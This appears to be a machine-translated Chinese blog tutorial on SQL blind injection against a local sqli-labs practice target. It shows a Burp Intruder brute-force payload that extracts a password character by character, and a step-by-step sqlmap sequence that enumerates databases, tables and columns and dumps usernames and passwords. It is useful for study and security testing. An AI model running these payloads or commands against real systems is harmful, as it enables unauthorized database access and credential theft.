当前位置:网站首页>[tools run SQL blind note]
[tools run SQL blind note]
2022-07-03 04:38:00 【Black zone (rise)】
Catalog
One 、( Tools )burp Running blind injection
1.2、 Method 2 : Injection statement explosion
Two 、( Tools )sqlmap Run Boolean blind injection
First step : Detect whether there is injection
The second step : Burst database name
The third step : Burst database table name
One 、( Tools )burp Running blind injection
1.1、 Method 1 : Blast
After grabbing the bag , Send the request to "Intruder" modular
Set up 2 Payloads
1.2、 Method 2 : Injection statement explosion
Inject construct statements , Iterate
(select case when '§0§' = lower(substring((select password from employees where empid=1),§1§,1)) then 1 else 0 end)
Two 、( Tools )sqlmap Run Boolean blind injection
2.1、 command :
-u Specify injection point
--dbs Run to the library name
--tables Running Watch name
--columns Run field name
--dump Enumerating data
Run out of the corresponding rear , Add... In turn -D Specify the library -T Designated table -C Specified field
2.2、 Use process :
First step : Detect whether there is injection
Basic operation
python sqlmap.py http://localhost:8080/sqli-labs-master/Less-5/?id=1 --batch
--batch Is to use the default settings
In fact, the environment has been swept out
You can add --dbms mysql 了
The second step : Burst database name
command
# Get all databases
sqlmap.py -u url --dbs --batch
---------
# Get the current database
sqlmap.py -u url --current-dbs --batch
Basic operation
python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-5/?id=1' --dbs --batch
The third step : Burst database table name
command
python sqlmap.py -u url -D DB --tables --batch
Basic operation
python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-5/?id=1' -D security --tables --batch
Step four : Pop field name
command :
sqlmap.py -u url -D DB -T TBL --columns --batch
Basic operation
python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-5/?id=1' -D security -T users --columns --batch
Step five : Burst data
command :
sqlmap.py -u url -D DB -T TBL -C "COL1,COL2" --dump --batch
Basic operation :
python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-5/?id=1' -D security -T users -C "username,password" --dump --batch
3、 ... and 、 recommend
【SQL Inject - No echo 】 Bull's blind note : principle 、 function 、 Use process
【SQL Inject - With echo 】DNS Request injection : principle 、 platform 、 Using process 、 To configure
边栏推荐
- AWS VPC
- Kingbasees plug-in KDB of Jincang database_ exists_ expand
- Symbol of array element product of leetcode simple problem
- Solve BP Chinese garbled code
- 怎么用Kotlin去提高生产力:Kotlin Tips
- 2022 tea master (intermediate) examination questions and tea master (intermediate) examination skills
- JVM原理简介
- 【工具跑SQL盲注】
- Some information about the developer environment in Chengdu
- The simple problem of leetcode: dismantling bombs
猜你喜欢
联发科技2023届提前批IC笔试(题目)
Employee attendance management system based on SSM
Sdl2 + OpenGL glsl practice (Continued)
FuncS sh file not found when using the benchmarksql tool to test kingbases
消息队列(MQ)介绍
FISCO bcos zero knowledge proof Fiat Shamir instance source code
《牛客刷verilog》Part II Verilog进阶挑战
How to retrieve the password for opening word files
stm32逆向入门
The reason why the entity class in the database is changed into hump naming
随机推荐
Small sample target detection network with attention RPN and multi relationship detector (provide source code, data and download)
I've been in software testing for 8 years and worked as a test leader for 3 years. I can also be a programmer if I'm not a professional
The usage of micro service project swagger aggregation document shows all micro service addresses in the form of swagger grouping
《牛客刷verilog》Part II Verilog进阶挑战
Introduction to message queuing (MQ)
2022 a special equipment related management (elevator) analysis and a special equipment related management (elevator) simulation test
使用BENCHMARKSQL工具对KingbaseES预热数据时执行:select sys_prewarm(‘NDX_OORDER_2 ‘)报错
Network security textual research recommendation
Priv app permission exception
2022 Shandong Province safety officer C certificate examination content and Shandong Province safety officer C certificate examination questions and analysis
Leetcode simple question: check whether the string is an array prefix
Joint set search: merge intervals and ask whether two numbers are in the same set
What's wrong with SD card data damage? How to recover SD card data damage
【SQL注入点】注入点出现位置、判断
[PCL self study: filtering] introduction and use of various filters in PCL (continuously updated)
Integration of Android high-frequency interview questions (including reference answers)
Leetcode simple problem delete an element to strictly increment the array
2022 new examination questions for the main principals of hazardous chemical business units and examination skills for the main principals of hazardous chemical business units
Human resource management system based on JSP
消息队列(MQ)介绍